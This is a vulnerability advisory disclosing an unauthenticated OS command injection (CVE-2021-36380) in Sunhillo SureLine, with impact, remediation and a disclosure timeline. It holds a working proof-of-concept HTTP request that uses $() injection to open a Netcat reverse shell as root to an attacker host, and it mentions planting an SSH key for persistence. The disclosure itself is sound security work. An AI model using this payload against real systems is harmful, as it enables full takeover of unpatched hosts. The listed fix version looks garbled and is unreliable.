Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)
Vendor: Sunhillo Vendor URL: https://www.sunhillo.com/ Versions affected: SureLine <= 8.7.0 Systems Affected: Any using SureLine Author: Liam Glanfield <email@example.com> Advisory URL / CVE Identifier: CVE-2021-36380 Risk: Critical - complete compromise of the host
Sunhillo is an industry leader in surveillance data distribution. The Sunhillo SureLine application contained an unauthenticated operating system (OS) command injection vulnerability that allowed an attacker to execute arbitrary commands with root privileges. This would have allowed for a threat actor to establish an interactive channel, effectively taking control of the target system.
Complete system compromise. With the threat actor in full control of the device they could cause a denial of service or utilise the device for persistence on the network.
The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
The script did appear to validate user input and blocked most techniques for OS command injection. Additionally, the request also did not require any authentication (session cookie etc.). However, command injection was still possible using $(), thus enabling arbitrary commands to be run within the parenthesis.
The following parameters were affected:
The following lines demonstrate the creation of a reverse connection to an attacker’s host, leading to the establishment of a covert channel, effectively allowing an attacker to execute commands on the server. The installed ‘nc’ package (Netcat) is used to create a reverse connection to an attacker’s host (192.168.1.2) on port TCP/8181 while redirecting all traffic (stdout and stderr) to and from the /bin/bash shell.
POST /cgi/networkDiag.cgi HTTP/1.1 Host: 192.168.1.1 Content-Length: 145 command=2 ipAddr= dnsAddr=$(nc+e+/bin/bash+192.168.1.2+8181) interface=0 netType=0 scrFilter= dstFilter= fileSave=false pcapSave=false fileSize=
The code above would send the shell to an attacker’s host, which in this case should have port 8181 on listening mode. This was compounded further by the web service running as root and with an interactive shell now established, the system would be in full control of the attacker. For example the attacker could add a SSH public key into /home/root/.ssh/authorized_keys and gain access as the root user.
Update Sunhillo SureLine to version 18.104.22.168.1.
NCC Group Notifies Vendor: 21st June 2021 Vendor Replies Requesting More Details: 21st June 2021 NCC Group Sends Requested information: 21st June 2021 Vendor Confirms The Vulnerability: 28th June 2021 NCC Group Requests a Patch Date: 28th June 2021 Vendor Response With Date: 7th July 2021 Patch Published: 22nd July 2021 Advisory Published: 26th July 2021
Liam Glanfield at NCC Group
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Publish Date: 7/26/2021
Written by: Liam Glanfield